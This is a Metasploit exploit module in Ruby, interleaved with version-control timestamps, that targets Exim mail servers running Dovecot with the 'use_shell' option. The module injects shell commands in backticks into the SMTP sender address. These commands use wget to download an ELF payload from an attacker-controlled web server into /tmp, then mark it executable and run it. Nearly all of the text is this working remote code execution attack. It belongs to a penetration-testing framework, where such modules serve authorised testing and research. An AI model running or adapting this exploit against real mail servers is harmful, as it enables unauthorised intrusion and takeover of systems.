2013-06-07 22:59:04 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Smtp
|
|
|
|
include Msf::Exploit::Remote::HttpServer
|
|
|
|
include Msf::Exploit::EXE
|
|
|
|
include Msf::Exploit::FileDropper
|
|
|
|
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2013-06-08 03:38:53 +00:00
|
|
|
'Name' => 'Exim and Dovecot Insecure Configuration Command Injection',
|
2013-06-07 22:59:04 +00:00
|
|
|
'Description' => %q{
|
2013-06-10 15:52:22 +00:00
|
|
|
This module exploits a command injection vulnerability against Dovecot with
|
2013-06-08 03:38:53 +00:00
|
|
|
Exim using the "use_shell" option. It uses the sender's address to inject arbitary
|
2013-06-10 15:52:22 +00:00
|
|
|
commands, since this is one of the user-controlled variables. It has been
|
|
|
|
successfully tested on Debian Squeeze using the default Exim4 with the dovecot-common
|
2013-06-08 03:38:53 +00:00
|
|
|
packages.
|
2013-06-07 22:59:04 +00:00
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Unknown', # From redteam-pentesting # Vulnerability Discovery and PoC
|
|
|
|
'eKKiM', # PoC
|
|
|
|
'juan vazquez' # Metasploit module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'OSVDB', '93004' ],
|
|
|
|
[ 'EDB', '25297' ],
|
|
|
|
[ 'URL', 'https://www.redteam-pentesting.de/advisories/rt-sa-2013-001' ]
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
'Platform' => 'linux',
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'DisableNops' => true
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2013-06-08 02:08:38 +00:00
|
|
|
[ 'Linux x86', { }],
|
2013-06-07 22:59:04 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => 'May 03 2013',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('EHLO', [ true, 'TO address of the e-mail', 'debian.localdomain']),
|
|
|
|
OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'root@debian.localdomain']),
|
|
|
|
OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
|
|
|
|
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
|
|
|
|
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 80 ]),
|
|
|
|
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
|
|
|
|
], self.class)
|
|
|
|
|
|
|
|
deregister_options('MAILFROM')
|
|
|
|
end
|
|
|
|
|
|
|
|
# wait for the data to be sent
|
|
|
|
def wait_linux_payload
|
|
|
|
print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
|
|
|
|
|
|
|
|
waited = 0
|
|
|
|
while (not @elf_sent)
|
|
|
|
select(nil, nil, nil, 1)
|
|
|
|
waited += 1
|
|
|
|
if (waited > datastore['HTTP_DELAY'])
|
2013-08-15 19:14:46 +00:00
|
|
|
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
|
2013-06-07 22:59:04 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Handle incoming requests from the server
|
|
|
|
def on_request_uri(cli, request)
|
|
|
|
if (not @pl)
|
|
|
|
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
|
|
|
|
@elf_sent = true
|
|
|
|
send_response(cli, @pl)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
@pl = generate_payload_exe
|
|
|
|
@elf_sent = false
|
|
|
|
|
|
|
|
#
|
|
|
|
# start our web server to deploy the final payload
|
|
|
|
#
|
|
|
|
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
|
|
|
|
resource_uri = '/' + downfile
|
|
|
|
|
|
|
|
if (datastore['DOWNHOST'])
|
|
|
|
service_url_payload = datastore['DOWNHOST'] + resource_uri
|
|
|
|
else
|
|
|
|
|
|
|
|
# Needs to be on the port 80
|
|
|
|
if datastore['SRVPORT'].to_i != 80
|
2013-08-15 19:14:46 +00:00
|
|
|
fail_with(Failure::Unknown, 'The Web Server needs to live on SRVPORT=80')
|
2013-06-07 22:59:04 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#do not use SSL
|
|
|
|
if datastore['SSL']
|
|
|
|
ssl_restore = true
|
|
|
|
datastore['SSL'] = false
|
|
|
|
end
|
|
|
|
|
|
|
|
#we use SRVHOST as download IP for the coming wget command.
|
|
|
|
#SRVHOST needs a real IP address of our download host
|
|
|
|
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
|
|
|
|
srv_host = Rex::Socket.source_address(rhost)
|
|
|
|
else
|
|
|
|
srv_host = datastore['SRVHOST']
|
|
|
|
end
|
|
|
|
|
|
|
|
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
|
|
|
|
service_url_payload = srv_host + resource_uri
|
|
|
|
print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
|
|
|
|
start_service({'Uri' => {
|
|
|
|
'Proc' => Proc.new { |cli, req|
|
|
|
|
on_request_uri(cli, req)
|
|
|
|
},
|
|
|
|
'Path' => resource_uri
|
|
|
|
}})
|
|
|
|
|
|
|
|
datastore['SSL'] = true if ssl_restore
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
connect
|
|
|
|
|
|
|
|
print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")
|
|
|
|
if self.banner.to_s !~ /Exim /
|
|
|
|
disconnect
|
2013-08-15 19:14:46 +00:00
|
|
|
fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!")
|
2013-06-07 22:59:04 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
ehlo = datastore['EHLO']
|
|
|
|
ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
|
|
|
|
ehlo_resp.each_line do |line|
|
|
|
|
print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Initiate the message
|
|
|
|
#
|
|
|
|
filename = rand_text_alpha_lower(8)
|
2013-06-07 23:05:11 +00:00
|
|
|
from = rand_text_alpha(3)
|
|
|
|
from << "`/usr/bin/wget${IFS}#{service_url_payload}${IFS}-O${IFS}/tmp/#{filename}`"
|
|
|
|
from << "`chmod${IFS}+x${IFS}/tmp/#{filename}`"
|
|
|
|
from << "`/tmp/#{filename}`"
|
|
|
|
from << "@#{ehlo}"
|
2013-06-07 22:59:04 +00:00
|
|
|
to = datastore['MAILTO']
|
|
|
|
|
|
|
|
resp = raw_send_recv("MAIL FROM: #{from}\r\n")
|
|
|
|
resp ||= 'no response'
|
|
|
|
msg = "MAIL: #{resp.strip}"
|
|
|
|
if not resp or resp[0,3] != '250'
|
2013-08-15 19:14:46 +00:00
|
|
|
fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
|
2013-06-07 22:59:04 +00:00
|
|
|
else
|
|
|
|
print_status("#{rhost}:#{rport} - #{msg}")
|
|
|
|
end
|
|
|
|
|
|
|
|
resp = raw_send_recv("RCPT TO: #{to}\r\n")
|
|
|
|
resp ||= 'no response'
|
|
|
|
msg = "RCPT: #{resp.strip}"
|
|
|
|
if not resp or resp[0,3] != '250'
|
2013-08-15 19:14:46 +00:00
|
|
|
fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
|
2013-06-07 22:59:04 +00:00
|
|
|
else
|
|
|
|
print_status("#{rhost}:#{rport} - #{msg}")
|
|
|
|
end
|
|
|
|
|
|
|
|
resp = raw_send_recv("DATA\r\n")
|
|
|
|
resp ||= 'no response'
|
|
|
|
msg = "DATA: #{resp.strip}"
|
|
|
|
if not resp or resp[0,3] != '354'
|
2013-08-15 19:14:46 +00:00
|
|
|
fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
|
2013-06-07 22:59:04 +00:00
|
|
|
else
|
|
|
|
print_status("#{rhost}:#{rport} - #{msg}")
|
|
|
|
end
|
|
|
|
|
|
|
|
message = "Subject: test\r\n"
|
|
|
|
message << "\r\n"
|
|
|
|
message << ".\r\n"
|
|
|
|
|
|
|
|
resp = raw_send_recv(message)
|
|
|
|
msg = "DELIVER: #{resp.strip}"
|
|
|
|
if not resp or resp[0,3] != '250'
|
2013-08-15 19:14:46 +00:00
|
|
|
fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
|
2013-06-07 22:59:04 +00:00
|
|
|
else
|
|
|
|
print_status("#{rhost}:#{rport} - #{msg}")
|
|
|
|
end
|
|
|
|
disconnect
|
|
|
|
|
|
|
|
# wait for payload download
|
|
|
|
if (datastore['DOWNHOST'])
|
|
|
|
print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")
|
|
|
|
select(nil, nil, nil, datastore['HTTP_DELAY'])
|
|
|
|
else
|
|
|
|
wait_linux_payload
|
|
|
|
end
|
|
|
|
register_file_for_cleanup("/tmp/#{filename}")
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|